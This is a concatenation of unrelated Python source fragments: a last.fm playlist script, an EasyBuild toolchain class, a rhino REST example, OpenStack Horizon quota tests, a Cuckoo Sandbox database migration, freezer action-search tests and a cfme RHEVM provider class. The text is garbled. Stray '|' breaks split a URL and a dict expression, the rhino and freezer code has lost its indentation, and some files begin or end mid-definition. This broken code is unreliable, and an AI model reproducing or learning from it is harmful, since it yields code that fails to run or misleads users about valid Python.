        # All credentials/paths come from config.ini, section [lastfm].
        self.api_key = config.get("lastfm",'key')
        self.music_dir = config.get("lastfm",'directory')
        self.page = page
        self.mp_dir = config.get("lastfm",'mudir')
        self.user = config.get("lastfm",'user')
        # Top-level artist directories of the local collection.
        self.dossier = os.listdir(self.music_dir)
        self.period = period
        self.limit = limit
        self.notfound = []
    #for i in req!
    def lastfm(self, meth):
        """Call the last.fm REST API; return parsed JSON or None on HTTP error."""
        try:
            url = 'http://ws.audioscrobbler.com/2.0/?api_key='+self.api_key+'&autocorrect=1'+meth+'&format=json&page='+str(self.page)
            txt = urllib2.urlopen(url).read()
            return json.loads(txt)
        except urllib2.HTTPError:
            #print '\n Error : '+art
            return None
    def toptracks(self):
        """Yield {'name', 'artist'} dicts for the user's top tracks."""
        url = '&method=user.gettoptracks&user='+self.user+'&limit='+self.limit+'&period='+self.period;
        req = self.lastfm(url)
        for i in req["toptracks"]["track"]:
            #if cc(i['artist']['name']) == "high tone":
            yield {'name':i['name'],'artist':cc(i['artist']['name'])}
    """Rechercher le dossier artiste, exacte ou levenshtein inferieure a longueur moins 2"""
    def findartist(self, artist):
        """Return the artist's directory name: exact canonical match first,
        otherwise the single closest Levenshtein candidate (else None)."""
        textlog = " find (" + artist + "):\n"
        lev = {}
        # Each artist directory in the local collection
        for art in self.dossier:
            ar = cc(art)
            # Exact match (case-, accent- and whitespace-insensitive)
            if ar == artist:
                ##print "YES BITCH"
                return art
            # Levenshtein distance: keep candidates that are close enough
            elif abs(len(ar) - len(artist)) < 5:
                l = Levenshtein.distance(ar, artist)
                if l < (len(art)/2):
                    if not l in lev.keys():
                        lev[l] = []
                    lev[l].append(art)
        # Pick the best candidate, but only if it is unambiguous
        textlog += str(lev) + "\n"
        if lev != {} and len( lev[min(lev.keys())] ) == 1:
            ##print lev[min(lev.keys())][0]
            ##print "YES BIS BITCHY BITCH"
            return lev[min(lev.keys())][0]
        else:
            pass ##print textlog
    """Rechercher le dossier artiste, exacte ou levenshtein inferieure a longueur moins 2"""
    def findtrack(self, artist, track, i=0, lev=False):
        """Recursively yield files under the artist directory that match
        *track*: substring matches, or [distance, path] pairs when lev=True."""
        # Walk everything inside the artist's directory
        base = self.music_dir + "/" + artist
        for fil in os.listdir(base):
            if os.path.isdir(base +"/"+ fil):
                ##print ("findtrack " + artist + " / " + fil + " - " + track)
                try:
                    # Recurse into album/sub-directories.
                    for result in self.findtrack(artist + "/" + fil, track, i=i+1, lev=lev):
                        yield result
                except UnicodeDecodeError:
                    pass
            if os.path.isfile(base +"/"+ fil):
                if lev:
                    # Compare canonical forms; fil[:-4] drops the extension.
                    nfil = cc(clean(unicode(fil[:-4],'utf-8')))
                    ntr = cc(clean(track))
                    l = Levenshtein.distance(ntr, nfil)
                    if l < len(ntr):
                        ##print "lev |" + ntr + "|" + nfil + "|"
                        ##print str(l) + " - " + str(len(cc(track)))
                        yield [l, base+"/"+fil]
                else:
                    if clean(track) in clean(unicode(fil,'utf-8')):
                        ##print base+"/"+fil
                        yield base+"/"+fil
    def mkdirs(self, li, pat):
        """Create the directory chain *li* under *pat*; return the leaf path."""
        if li != []:
            dd = os.path.join(pat, li[0])
            if not os.path.isdir( dd ):
                ##print "mkdir(" + dd+")"
                os.mkdir(dd)
            return self.mkdirs(li[1:], dd)
        else:
            return pat
    def move(self, t):
        """Copy track *t* into the portable-player dir, mirroring its
        relative layout; return 1 if an identical-size copy already exists."""
        dirs = t[len(self.music_dir)+1:].split("/")
        new = self.mkdirs(dirs[:-1], self.mp_dir)
        dst = os.path.join(new, dirs[-1])
        if os.path.isfile( dst ):
            # Replace only when the sizes differ; otherwise keep the copy.
            if os.path.getsize(t) != os.path.getsize(dst):
                os.remove(dst)
            else:
                return 1
        shutil.copyfile(t, dst)
        ##print "exist"
        #shutil.copyfile(t, dst)
    def findtrackall(self, a, i):
        """Best local file for track *i* under artist dir *a*: first
        substring hit, else closest Levenshtein candidate, else 0."""
        for t in self.findtrack(a, i['name']):
            return t
        ##print "### :: " + i['artist'] + '-' + i['name'] + ""
        ties = []
        for t in self.findtrack(a, i['name'], lev=True):
            ties.append(t)
        if len(ties) == 0:
            return 0
        if len(ties) == 1:
            ##print ties[0][1]
            return ties[0][1]
        else:
            # Several candidates: keep the one with the smallest distance.
            ties = sorted(ties, key=getKey)
            ##print ties[0][1]
            return ties[0][1]
    def run(self):
        """Resolve every top track to a local file, write the .m3u playlist
        and optionally copy files to the portable-player directory."""
        file = time.strftime("TOP"+self.limit+"_%m%d%H%M.m3u")
        fo = open(file, 'w+')
        number = 0
        for i in self.toptracks():
            number += 1
            print number
            #for i in [{'name':u"The sound of silence",'artist':u"Simon and Garfunkel"}]:
            a = self.findartist(i['artist'])
            t = 0
            if a:
                t = self.findtrackall(a, i)
            if t == 0:
                # Fall back to compilations.
                t = self.findtrackall("Various Artists", i)
            ##print t
            if t != 0:
                fo.write(t+"\n")
                if os.path.isdir( self.mp_dir ):
                    self.move(t)
            else:
                #print "###########"
                #print i['artist'] + '-' + i['name']
                pass
        #print self.notfound
        #print '--finished--'
        fo.close()
    # Example of the XSPF format that could be emitted instead:
    # <?xml version="1.0" encoding="UTF-8"?>
    # <playlist version="1" xmlns="http://xspf.org/ns/0/">
    # <trackList>
    # <track><location>file:///media/data/Musique/Cypress Hill/2010 - Rise Up/Cypress Hill - Rise Up - 13 - Armed and Dangerous.mp3</location></track>
    # <track><location>file:///media/data/Musique/The Black Keys/Attack & Release/The Black Keys - Psychotic Girl.mp3</location></track>
    # <track><location>file:///media/data/Musique/Odezenne/2012 - OVNI edition Louis XIV/13 - Hirondelles.mp3</location></track>
    # </trackList>
    # </playlist>
    pass
# CLI entry: playlist.py [length] [page] [period]
if len(sys.argv) == 0 :
    # NOTE(review): sys.argv always contains at least the script name, so
    # this branch is effectively dead and usage is never printed.
    print "usage : python playlist.py length page"
else:
    if len(sys.argv) <= 1 :
        # No arguments: default to the top 100 tracks.
        p = playlist(100)
    elif len(sys.argv) <= 2 :
        p = playlist(sys.argv[1])
    elif len(sys.argv) <= 3 :
        p = playlist(sys.argv[1], sys.argv[2])
    else: p = playlist(sys.argv[1], sys.argv[2], sys.argv[3])
    p.run()
|
##
# Copyright 2012-2021 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://ww | w.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
# |
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for gomkl compiler toolchain (includes GCC, OpenMPI,
Intel Math Kernel Library (MKL) and Intel FFTW wrappers).
:author: Stijn De Weirdt (Ghent University)
:author: Kenneth Hoste (Ghent University)
:author: Ake Sandgren (Umea University)
"""
from easybuild.toolchains.gompi import Gompi
from easybuild.toolchains.gmkl import Gmkl
from easybuild.toolchains.fft.intelfftw import IntelFFTW
from easybuild.toolchains.linalg.intelmkl import IntelMKL
class Gomkl(Gompi, IntelMKL, IntelFFTW):
    """Compiler toolchain with GCC, OpenMPI, Intel Math Kernel Library (MKL) and Intel FFTW wrappers."""
    NAME = 'gomkl'
    # Immediate parent toolchains in the hierarchy (used for subtoolchain
    # resolution): gompi = GCC + OpenMPI, gmkl = GCC + MKL.
    SUBTOOLCHAIN = [Gompi.NAME, Gmkl.NAME]
|
import json
from rhino import Mapper, get
# Our internal representation: the example domain object that each
# representation version below serializes a subset of.
report = {
    'title': 'foo',
    'author': 'Fred',
    'date': '2015-01-09',
    'tags': ['a', 'b', 'c'],
}
# Base class for our representations
class report_repr(object):
@classmethod
def serialize(cls, report):
obj = dict([(k, report | [k]) for k in cls.fields])
return json.dumps(obj, sort_keys=True)
# Different versions of the representation: each version adds fields while
# keeping its own media type, so clients pick a version via content
# negotiation.
class report_v1(report_repr):
    provides = 'application/vnd.acme.report+json;v=1'
    fields = ['title', 'author']
class report_v2(report_repr):
    provides = 'application/vnd.acme.report+json;v=2'
    fields = ['title', 'author', 'date']
class report_v3(report_repr):
    provides = 'application/vnd.acme.report+json;v=3'
    fields = ['title', 'author', 'date', 'tags']
# One handler can handle multiple representations.
# Here, report_v3 is the default when the client doesn't specify a preference.
@get(produces=report_v1)
@get(produces=report_v2)
@get(produces=report_v3)
def get_report(request):
    # Content negotiation selects the representation; the handler only
    # returns the raw domain object.
    return report
app = Mapper()
app.add('/', get_report)
if __name__ == '__main__':
    app.start_server()
|
# Copyright 2013 Kylin, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.urls import reverse
import mock
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
# Resolved once at import time: the admin "default quotas" index page.
INDEX_URL = reverse('horizon:admin:defaults:index')
class ServicesViewTests(test.BaseAdminViewTests):
    """Tests for the admin "Defaults" panel index view.

    All backend calls (nova/cinder/neutron default quotas, service
    availability checks) are mocked; the test only exercises the view
    and the quota tables it renders.
    """
    @test.create_mocks({
        api.nova: [('default_quota_get', 'nova_default_quota_get')],
        api.cinder: [('default_quota_get', 'cinder_default_quota_get'),
                     'is_volume_service_enabled'],
        api.base: ['is_service_enabled'],
        api.neutron: [('default_quota_get', 'neutron_default_quota_get')],
        quotas: ['enabled_quotas']})
    def test_index(self):
        """Render the index page and verify each quota table's contents."""
        # Neutron does not have an API for getting default system
        # quotas. When not using Neutron, the floating ips quotas
        # should be in the list.
        self.mock_is_volume_service_enabled.return_value = True
        self.mock_is_service_enabled.return_value = True
        compute_quotas = [q.name for q in self.quotas.nova]
        self.mock_enabled_quotas.return_value = compute_quotas
        self.mock_nova_default_quota_get.return_value = self.quotas.nova
        self.mock_cinder_default_quota_get.return_value = \
            self.cinder_quotas.first()
        self.mock_neutron_default_quota_get.return_value = \
            self.neutron_quotas.first()
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'admin/defaults/index.html')
        # Compute quota rows expected from the nova test fixtures.
        expected_data = [
            '<Quota: (injected_file_content_bytes, 1)>',
            '<Quota: (metadata_items, 1)>',
            '<Quota: (injected_files, 1)>',
            '<Quota: (ram, 10000)>',
            '<Quota: (instances, 10)>',
            '<Quota: (cores, 10)>',
            '<Quota: (key_pairs, 100)>',
            '<Quota: (server_groups, 10)>',
            '<Quota: (server_group_members, 10)>',
            '<Quota: (injected_file_path_bytes, 255)>',
        ]
        self._check_quotas_data(res, 'compute_quotas', expected_data)
        # Volume quota rows expected from the cinder test fixtures.
        expected_data = [
            '<Quota: (gigabytes, 1000)>',
            '<Quota: (snapshots, 1)>',
            '<Quota: (volumes, 1)>',
        ]
        self._check_quotas_data(res, 'volume_quotas', expected_data)
        # Network quota rows expected from the neutron test fixtures.
        expected_data = [
            '<Quota: (network, 10)>',
            '<Quota: (subnet, 10)>',
            '<Quota: (port, 50)>',
            '<Quota: (router, 10)>',
            '<Quota: (floatingip, 50)>',
            '<Quota: (security_group, 20)>',
            '<Quota: (security_group_rule, 100)>',
        ]
        self._check_quotas_data(res, 'network_quotas', expected_data)
        # Verify every mocked backend call happened the expected number
        # of times and with the expected arguments.
        self.mock_is_volume_service_enabled.assert_called_once_with(
            test.IsHttpRequest())
        self.assertEqual(2, self.mock_is_service_enabled.call_count)
        self.mock_is_service_enabled.assert_has_calls([
            mock.call(test.IsHttpRequest(), 'compute'),
            mock.call(test.IsHttpRequest(), 'network')])
        self.assert_mock_multiple_calls_with_same_arguments(
            self.mock_enabled_quotas, 4,
            mock.call(test.IsHttpRequest()))
        self.mock_nova_default_quota_get.assert_called_once_with(
            test.IsHttpRequest(), self.tenant.id)
        self.mock_cinder_default_quota_get.assert_called_once_with(
            test.IsHttpRequest(), self.tenant.id)
        self.mock_neutron_default_quota_get.assert_called_once_with(
            test.IsHttpRequest())
    def _check_quotas_data(self, res, slug, expected_data):
        """Assert the table registered under *slug* holds exactly
        *expected_data* (order-insensitive)."""
        quotas_tab = res.context['tab_group'].get_tab(slug)
        self.assertQuerysetEqual(quotas_tab._tables[slug].data,
                                 expected_data,
                                 ordered=False)
class UpdateDefaultQuotasTests(test.BaseAdminViewTests):
    """Tests for the 'Update Default Quotas' admin workflow."""
    def _get_quota_info(self, quota):
        """Build a POST-able ``{field: int limit}`` dict from a quota set.

        'fixed_ips' is skipped (not updatable through this form) and a
        falsy limit falls back to 10 so every field has a valid value.
        """
        quota_data = {}
        updatable_quota_fields = (quotas.NOVA_QUOTA_FIELDS |
                                  quotas.CINDER_QUOTA_FIELDS)
        for field in updatable_quota_fields:
            if field != 'fixed_ips':
                limit = quota.get(field).limit or 10
                quota_data[field] = int(limit)
        return quota_data
    @test.create_mocks({
        api.nova: [('default_quota_update', 'nova_default_quota_update'),
                   ('default_quota_get', 'nova_default_quota_get')],
        api.cinder: [('default_quota_update', 'cinder_default_quota_update'),
                     ('default_quota_get', 'cinder_default_quota_get')],
        quotas: ['get_disabled_quotas']})
    def test_update_default_quotas(self):
        """POST updated limits and verify the nova and cinder update APIs
        each receive exactly their own subset of fields."""
        quota = self.quotas.first() + self.cinder_quotas.first()
        self.mock_get_disabled_quotas.return_value = set()
        self.mock_nova_default_quota_get.return_value = self.quotas.first()
        self.mock_nova_default_quota_update.return_value = None
        self.mock_cinder_default_quota_get.return_value = \
            self.cinder_quotas.first()
        self.mock_cinder_default_quota_update.return_value = None
        # update some fields
        quota[0].limit = 123
        quota[1].limit = -1
        updated_quota = self._get_quota_info(quota)
        url = reverse('horizon:admin:defaults:update_defaults')
        res = self.client.post(url, updated_quota)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)
        self.mock_get_disabled_quotas.assert_called_once_with(
            test.IsHttpRequest())
        # Nova must only be sent the nova fields (minus 'fixed_ips').
        nova_fields = quotas.NOVA_QUOTA_FIELDS
        nova_updated_quota = dict((key, updated_quota[key]) for key in
                                  nova_fields if key != 'fixed_ips')
        self.mock_nova_default_quota_get.assert_called_once_with(
            test.IsHttpRequest(), self.request.user.tenant_id)
        self.mock_nova_default_quota_update.assert_called_once_with(
            test.IsHttpRequest(), **nova_updated_quota)
        # Cinder must only be sent the cinder fields.
        cinder_updated_quota = dict((key, updated_quota[key]) for key in
                                    quotas.CINDER_QUOTA_FIELDS)
        self.mock_cinder_default_quota_get.assert_called_once_with(
            test.IsHttpRequest(), self.request.user.tenant_id)
        self.mock_cinder_default_quota_update.assert_called_once_with(
            test.IsHttpRequest(), **cinder_updated_quota)
|
# Copyright (C) 2010-2013 Claudio Guarnieri.
# Copyright (C) 2014-2016 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
"""Added failed statuses to tasks (from Cuckoo 1.1 to 1.2)
Revision ID: 495d5a6edef3
Revises: 18eee46c6f81
Create Date: 2015-02-28 19:08:29.284111
"""
# Spaghetti as a way of life.
# Revision identifiers, used by Alembic.
revision = "495d5a6edef3"
down_revision = "18eee46c6f81"
import sqlalchemy as sa
from datetime import datetime
from alembic import op
from dateutil.parser import parse
import cuckoo.core.database as db
def upgrade():
    """Upgrade the ``tasks`` table from the Cuckoo 1.1 to the 1.2 schema.

    PostgreSQL only needs the new ``failed_reporting`` value added to the
    existing ``status_type`` ENUM.  Every other backend has no ALTER support
    we can rely on, so the table is dumped to memory, dropped, recreated
    with the 1.2 schema and refilled.
    """
    conn = op.get_bind()
    # Alembic is so ORMish that it was impossible to write code which works
    # the same on every DBMS, hence the per-driver branches below.
    if conn.engine.driver == "psycopg2":
        # Raw SQL because alembic doesn't deal well with alter_column on an
        # ENUM type.  COMMIT first because SQLAlchemy doesn't support
        # ALTER TYPE inside a transaction.
        op.execute('COMMIT')
        conn.execute("ALTER TYPE status_type ADD VALUE 'failed_reporting'")
        return
    # Read all existing rows before dropping the table.
    old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, clock, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
    tasks_data = [_task_row_to_dict(row) for row in old_tasks]
    if conn.engine.driver == "mysqldb":
        # Disable foreign key checking to migrate the table avoiding checks.
        op.execute('SET foreign_key_checks = 0')
        op.drop_table("tasks")
        # Drop the old ENUM so create_table can recreate it with the new value.
        sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
        _create_tasks_table()
        op.execute('COMMIT')
        op.bulk_insert(db.Task.__table__, tasks_data)
        # Re-enable foreign key checking.
        op.execute('SET foreign_key_checks = 1')
    else:
        # SQLite and friends: plain drop/recreate/refill.
        op.drop_table("tasks")
        _create_tasks_table()
        op.bulk_insert(db.Task.__table__, tasks_data)

def _to_datetime(value):
    """Coerce a column value to a datetime.

    Datetimes pass through unchanged, non-empty strings are parsed with
    dateutil, and empty/None values map to None.
    """
    if isinstance(value, datetime):
        return value
    if value:
        return parse(value)
    return None

def _task_row_to_dict(row):
    """Convert one 1.1 ``tasks`` row tuple into a dict for bulk insertion."""
    keys = ("id", "target", "category", "timeout", "priority", "custom",
            "machine", "package", "options", "platform", "memory",
            "enforce_timeout")
    d = dict(zip(keys, row[:12]))
    # Timestamp columns may come back as datetimes, strings or NULL
    # depending on the backend.
    d["clock"] = _to_datetime(row[12])
    d["added_on"] = _to_datetime(row[13])
    d["started_on"] = _to_datetime(row[14])
    d["completed_on"] = _to_datetime(row[15])
    d["status"] = row[16]
    d["sample_id"] = row[17]
    return d

def _create_tasks_table():
    """Create the ``tasks`` table with the Cuckoo 1.2 schema."""
    op.create_table(
        "tasks",
        sa.Column("id", sa.Integer(), nullable=False),
        sa.Column("target", sa.String(length=255), nullable=False),
        sa.Column("category", sa.String(length=255), nullable=False),
        sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
        sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
        sa.Column("custom", sa.String(length=255), nullable=True),
        sa.Column("machine", sa.String(length=255), nullable=True),
        sa.Column("package", sa.String(length=255), nullable=True),
        sa.Column("options", sa.String(length=255), nullable=True),
        sa.Column("platform", sa.String(length=255), nullable=True),
        sa.Column("memory", sa.Boolean(), nullable=False, default=False),
        sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
        sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False),
        sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
        sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
        sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
        sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False),
        sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
        sa.PrimaryKeyConstraint("id")
    )
def downgrade():
    """Downgrading is intentionally unsupported for this migration."""
    pass
|
self.fake_action_2.get('max_retries'))
self.assertEqual(result.get('max_retries_interval'),
self.fake_action_2.get('max_retries_interval'))
freezer_action = result.get('freezer_action')
self.assertEqual(freezer_action.get('action'),
self.freezer_action_2.get('action'))
patch_doc1 = copy.deepcopy(self.fake_action_0)
result = self.dbapi.replace_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
doc=patch_doc1,
action_id=self.fake_action_id)
self.assertIsNotNone(result)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
action_id=self.fake_action_id)
self.assertEqual(result.get('action_id'), self.fake_action_id)
def test_add_and_search_action(self):
count = 0
actionids = []
while(count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=10,
offset=0)
self.assertIsNotNone(result)
self.assertEqual(len(result), 10)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(actionids[index], actionmap['action_id'])
def test_action_list_with_search_match_and_match_not(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match_not': [{'mode': 'nova'}],
'match': [{'max_retries': 10}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 3)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('fs',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_match_list(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match': [{'max_retries': 10},
{'mode': 'nova'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 2)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('nova',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_match_not_list(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match_not':
[{'mode': 'nova'},
{'max_retries': 5}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 3)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('fs',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_with_all_opt_one_match(self):
count = 0
actionids = []
| while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
d | oc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match': [{'_all': '[{"max_retries": 10}]'}]}
|
import attr
from widgetastic.widget import View, Text
from widgetastic_patternfly import Tab, Input, BootstrapSwitch, Button
from wrapanapi.rhevm import RHEVMSystem
from cfme.common.candu_views import VMUtilizationView
from cfme.common.provider import CANDUEndpoint, DefaultEndpoint, DefaultEndpointForm
from cfme.common.provider_views import BeforeFillMixin
from cfme.exceptions import ItemNotFound
from cfme.services.catalogs.catalog_items import RHVCatalogItem
from cfme.utils import version
from widgetastic_manageiq import LineChart
from . import InfraProvider
class RHEVMEndpoint(DefaultEndpoint):
    """Default API endpoint of a RHV/RHEVM provider."""
    @property
    def view_value_mapping(self):
        """Values filled into the 'Default' endpoint tab of the Add
        Provider form.

        TLS-related fields only exist from appliance version 5.8.0.8 on,
        so version.pick maps them to None on anything older.
        """
        tls_since_version = '5.8.0.8'
        mapping = {
            'hostname': self.hostname,
            'api_port': getattr(self, 'api_port', None),
        }
        mapping['verify_tls'] = version.pick({
            version.LOWEST: None,
            tls_since_version: getattr(self, 'verify_tls', None)})
        mapping['ca_certs'] = version.pick({
            version.LOWEST: None,
            tls_since_version: getattr(self, 'ca_certs', None)})
        return mapping
class RHEVMEndpointForm(View):
    """Form view for configuring a RHV provider's endpoints
    (Default API tab plus the C&U metrics database tab)."""
    @View.nested
    class default(Tab, DefaultEndpointForm, BeforeFillMixin):  # NOQA
        TAB_NAME = 'Default'
        # Widgets on top of DefaultEndpointForm: API port and TLS settings.
        api_port = Input('default_api_port')
        verify_tls = BootstrapSwitch(id='default_tls_verify')
        ca_certs = Input('default_tls_ca_certs')
    @View.nested
    class candu(Tab, BeforeFillMixin):  # NOQA
        TAB_NAME = 'C & U Database'
        # Connection details for the Capacity & Utilization database.
        hostname = Input('metrics_hostname')
        api_port = Input('metrics_api_port')
        database_name = Input('metrics_database_name')
        username = Input('metrics_userid')
        password = Input('metrics_password')
        confirm_password = Input('metrics_verify')
        change_password = Text(locator='.//a[normalize-space(.)="Change stored password"]')
        validate = Button('Validate')
class RHEVMVMUtilizationView(VMUtilizationView):
    """A VM Utilization view for rhevm providers"""
    # C&U line charts, in the order they appear on the utilization page.
    vm_cpu = LineChart(id='miq_chart_parent_candu_0')
    vm_memory = LineChart(id='miq_chart_parent_candu_1')
    vm_disk = LineChart(id='miq_chart_parent_candu_2')
    vm_network = LineChart(id='miq_chart_parent_candu_3')
@attr.s(hash=False)
class RHEVMProvider(InfraProvider):
    """InfraProvider implementation for Red Hat Virtualization (RHV/RHEVM).

    Fixes over the previous revision: the four console helpers shared a
    copy-pasted try/except with a *bare* ``except:`` (which also swallowed
    KeyboardInterrupt/SystemExit); the lookup is now centralized in
    ``_find_console_element`` and catches ``Exception`` only.
    """
    catalog_item_type = RHVCatalogItem
    vm_utilization_view = RHEVMVMUtilizationView
    type_name = "rhevm"
    mgmt_class = RHEVMSystem
    db_types = ["Redhat::InfraManager"]
    endpoints_form = RHEVMEndpointForm
    discover_dict = {"rhevm": True}
    settings_key = 'ems_redhat'
    # xpath locators for elements, to be used by selenium
    _console_connection_status_element = '//*[@id="connection-status"]|//*[@id="message-div"]'
    _canvas_element = '(//*[@id="remote-console"]/canvas|//*[@id="spice-screen"]/canvas)'
    _ctrl_alt_del_xpath = '//*[@id="ctrlaltdel"]'
    _fullscreen_xpath = '//*[@id="fullscreen"]'
    bad_credentials_error_msg = "Credential validation was not successful"
    ems_events = [
        ('vm_create', {'event_type': 'USER_ADD_VM_FINISHED_SUCCESS', 'vm_or_template_id': None}),
        ('vm_stop', {'event_type': 'USER_STOP_VM', 'vm_or_template_id': None}),
        ('vm_start', {'event_type': 'USER_RUN_VM', 'vm_or_template_id': None}),
        ('vm_delete', {'event_type': 'USER_REMOVE_VM_FINISHED', 'vm_or_template_id': None})
    ]
    @property
    def view_value_mapping(self):
        """Values filled into the Add Provider form for this provider."""
        return {
            'name': self.name,
            'prov_type': 'Red Hat Virtualization'
        }
    def deployment_helper(self, deploy_args):
        """ Used in utils.virtual_machines """
        # Supply the provider's default cluster when the caller didn't pick one.
        if 'default_cluster' not in deploy_args:
            return {'cluster': self.data['default_cluster']}
        return {}
    @classmethod
    def from_config(cls, prov_config, prov_key):
        """Instantiate the provider from its YAML configuration mapping."""
        # Keep only the endpoint entries this provider type understands.
        endpoints = {}
        for endp in prov_config['endpoints']:
            for expected_endpoint in (RHEVMEndpoint, CANDUEndpoint):
                if expected_endpoint.name == endp:
                    endpoints[endp] = expected_endpoint(**prov_config['endpoints'][endp])
        if prov_config.get('discovery_range'):
            start_ip = prov_config['discovery_range']['start']
            end_ip = prov_config['discovery_range']['end']
        else:
            # No explicit range: discover just the provider's own address.
            start_ip = end_ip = prov_config.get('ipaddress')
        return cls.appliance.collections.infra_providers.instantiate(
            prov_class=cls,
            name=prov_config['name'],
            endpoints=endpoints,
            zone=prov_config.get('server_zone', 'default'),
            key=prov_key,
            start_ip=start_ip,
            end_ip=end_ip)
    # Following methods will only work if the remote console window is open
    # and if selenium focused on it. These will not work if the selenium is
    # focused on Appliance window.
    def _find_console_element(self, xpath):
        """Locate *xpath* in the remote console window.

        Raises ItemNotFound when the element is absent (e.g. the console
        window doesn't have focus).  Catches Exception, not a bare except,
        so KeyboardInterrupt/SystemExit still propagate.
        """
        try:
            return self.appliance.browser.widgetastic.selenium.find_element_by_xpath(xpath)
        except Exception:
            raise ItemNotFound("Element not found on screen, is current focus on console window?")
    def get_console_connection_status(self):
        """Return the text of the console connection-status element."""
        return self._find_console_element(self._console_connection_status_element).text
    def get_remote_console_canvas(self):
